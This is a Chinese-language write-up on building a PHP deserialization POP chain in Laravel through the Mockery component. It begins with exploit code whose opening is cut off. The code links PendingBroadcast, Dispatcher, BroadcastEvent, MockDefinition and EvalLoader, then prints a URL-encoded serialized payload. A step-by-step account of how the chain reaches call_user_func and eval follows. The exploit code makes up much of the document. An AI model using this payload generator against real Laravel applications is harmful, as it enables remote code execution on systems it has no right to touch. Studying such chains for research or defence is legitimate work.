POP链挖掘

Laravel mockery组件

exp:

events = $events;
      $this->event = $event;
    }
  }
}

namespace Illuminate\Bus{
  class Dispatcher
  {
    protected $queueResolver;

    public function __construct($queueResolver)
    {
      $this->queueResolver = $queueResolver;
    }
  }
}

namespace Illuminate\Broadcasting{
  class BroadcastEvent
  {
    public $connection;

    public function __construct($connection)
    {
      $this->connection = $connection;
    }
  }
}


namespace Mockery\Generator{
  class MockDefinition
  {
    protected $config;
    protected $code = '';

    public function __construct($config)
    {
      $this->config = $config;
    }
  }
}

namespace Mockery\Generator{
  class MockConfiguration
  {
    protected $name = '1234';
  }
}

namespace Mockery\Loader{
  class EvalLoader
  {
     public function load(MockDefinition $definition)
     {

     }
  }
}

namespace{
  $Mockery = new Mockery\Loader\EvalLoader();
  $queueResolver = array($Mockery, "load");
  $MockConfiguration = new Mockery\Generator\MockConfiguration();
  $MockDefinition = new Mockery\Generator\MockDefinition($MockConfiguration);
  $BroadcastEvent = new Illuminate\Broadcasting\BroadcastEvent($MockDefinition);
  $Dispatcher = new Illuminate\Bus\Dispatcher($queueResolver);
  $PendingBroadcast = new Illuminate\Broadcasting\PendingBroadcast($Dispatcher,$BroadcastEvent);
  echo urlencode(serialize($PendingBroadcast));
}
?>

构造过程

入口类： PendingBroadcast

这里的 $this->events 是 Dispatcher 接口的，这里我们找到一个实现了 Dispatcher 接口的类

跟进

看一下 commandShouldBeQueued 方法

要求 $command 实现了 ShouldQueue 接口，注意此时的 $command 其实就是 PendingBroadcast的 $event(是可控的)

找到其中一个类 BroadcastEvent，我们可以将 PendingBroadcast 的 $event 覆盖为 BroadcastEvent

继续跟进 dispatchToQueue 方法，看到 call_user_func 方法

注意此时的 $command 其实已经覆盖为 BroadcastEvent 类了，connetcion 属性可控

此时我们要考虑调用哪个函数，这里使用了 EvalLoader 类

如果要调用这个函数，那么 if 条件必须是 false，查看 MockDefinition 类

覆盖 $this-config 为 MockConfiguration 这个类，给它的 name 属性随便赋值即可

ok就到这里了